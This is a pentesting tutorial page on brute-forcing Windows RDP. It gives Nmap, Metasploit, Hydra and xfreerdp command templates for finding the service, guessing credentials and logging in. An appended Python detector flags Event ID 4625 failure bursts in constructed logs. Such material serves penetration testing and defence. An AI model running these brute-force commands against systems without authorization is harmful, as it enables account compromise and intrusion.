🧨Exploiting RDP - Brute Force
Exploiting RDP
The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.
RDP uses TCP port 3389 by default, and can also be configured to run on any other TCP port.
RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.
We can perform an RDP brute-force attack to identify legitimate user credentials that we can use to gain remote access to the target system.
Attack Flow for Exploiting RDP - Brute Force
1. Identify Running Services and Their Versions
Objective: Determine the versions of the running services on the target system.
Command:
nmap -sV -O <Target_IP>
Description: Use Nmap to scan the target system and identify the versions of the running services.
Alternative Command Using Metasploit:
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <Target_IP>
run
Description: Use the rdp_scanner module in Metasploit to identify RDP service details on the target system.
2. Perform Brute Force Attack
Objective: Obtain valid RDP credentials through a brute force attack.
Command:
hydra -L <user-list> -P <pass-list> rdp://<target-ip> -s <port>
Description: Use Hydra to perform a brute force attack on the RDP service of the target system using specified user and password lists.
3. Establish RDP Connection
Objective: Connect to the victim's machine using the obtained credentials.
Command:
xfreerdp /u:<user> /p:<password> /v:<Target_IP>:<port>
Description: Use xfreerdp to establish an RDP connection to the target system with the obtained username and password.
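The flow above is visible from the defender's side as a burst of failed logons from one source address. The following is an added example (not code from this page or from the tools it names) that flags that pattern in Windows Security log data: Event ID 4625 ("An account failed to log on") with LogonType 10 (RemoteInteractive) or LogonType 3 (Network, which is where failures land when Network Level Authentication is enabled). The pipe-delimited line format, the sample addresses, the usernames and the thresholds are all constructed assumptions for this example; a real deployment would read the same fields (TargetUserName, LogonType, IpAddress) from the event log or a SIEM.

```python
"""Flag RDP password-guessing from Windows Security log lines (added example).

Assumptions (not from the page): each log line is a constructed
'key=value|key=value' record carrying the fields of Event ID 4625;
an alert is raised when one source address produces at least
`threshold` RDP-type failures inside a sliding `window_seconds` window.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# LogonType 10 = RemoteInteractive (classic RDP); 3 = Network (NLA-protected RDP)
RDP_LOGON_TYPES = {3, 10}
FAILED_LOGON_EVENT_ID = 4625


def parse_event(line):
    """Parse one constructed 'key=value|...' line into a typed dict."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return {
        "time": datetime.strptime(fields["time"], "%Y-%m-%dT%H:%M:%S"),
        "event_id": int(fields["event_id"]),
        "logon_type": int(fields["logon_type"]),
        "user": fields["user"],
        "src_ip": fields["src_ip"],
    }


def detect_rdp_bruteforce(lines, threshold=5, window_seconds=120):
    """Return {src_ip: details} for sources exceeding the failure threshold."""
    events = sorted((parse_event(ln) for ln in lines), key=lambda e: e["time"])
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # per-source timestamps inside the window
    users = defaultdict(set)      # usernames each source has tried
    alerts = {}
    for ev in events:
        # Only failed logons that arrived over RDP-style logon types count
        if ev["event_id"] != FAILED_LOGON_EVENT_ID or ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip = ev["src_ip"]
        q = recent[ip]
        q.append(ev["time"])
        users[ip].add(ev["user"])
        # Slide the window: drop failures older than window_seconds
        while q and ev["time"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(ip, {}).get("failures_in_window", 0))
            alerts[ip] = {
                "failures_in_window": peak,
                "users": sorted(users[ip]),       # password spray shows as many names
                "last_seen": ev["time"].isoformat(),
            }
    return alerts


def _line(ts, event_id, logon_type, user, src_ip):
    return f"time={ts}|event_id={event_id}|logon_type={logon_type}|user={user}|src_ip={src_ip}"


# Constructed sample log: one guessing burst, one benign typo, one non-RDP source
BASE = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE_LOG = []
for i in range(12):   # 12 RDP failures in one minute from 10.0.0.5, rotating three names
    ts = (BASE + timedelta(seconds=5 * i)).strftime("%Y-%m-%dT%H:%M:%S")
    SAMPLE_LOG.append(_line(ts, 4625, 10 if i % 2 else 3,
                            ["Administrator", "admin", "bob"][i % 3], "10.0.0.5"))
for i in range(2):    # two mistyped passwords from 10.0.0.9: below threshold
    ts = (BASE + timedelta(seconds=30 * i)).strftime("%Y-%m-%dT%H:%M:%S")
    SAMPLE_LOG.append(_line(ts, 4625, 10, "alice", "10.0.0.9"))
for i in range(6):    # six console (LogonType 2) failures from 10.0.0.7: not RDP, ignored
    ts = (BASE + timedelta(seconds=5 * i)).strftime("%Y-%m-%dT%H:%M:%S")
    SAMPLE_LOG.append(_line(ts, 4625, 2, "carol", "10.0.0.7"))


def run_sample():
    """Run the detector over the constructed sample with default thresholds."""
    return detect_rdp_bruteforce(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, info in run_sample().items():
        print(f"ALERT {ip}: {info['failures_in_window']} RDP failures, users tried: {info['users']}")
```

On the sample data only 10.0.0.5 is reported, with all twelve failures inside the window and the three usernames it cycled through; the benign source stays under the threshold and the console failures are excluded by logon type. The same threshold-in-window logic is what account-lockout policies and RDP-aware alerting rules apply, which is why restricting RDP exposure, enforcing NLA and lockout, and alerting on 4625 bursts blunt the flow described above.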
Hacker's Mantra:
Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. - Kevin Mitnick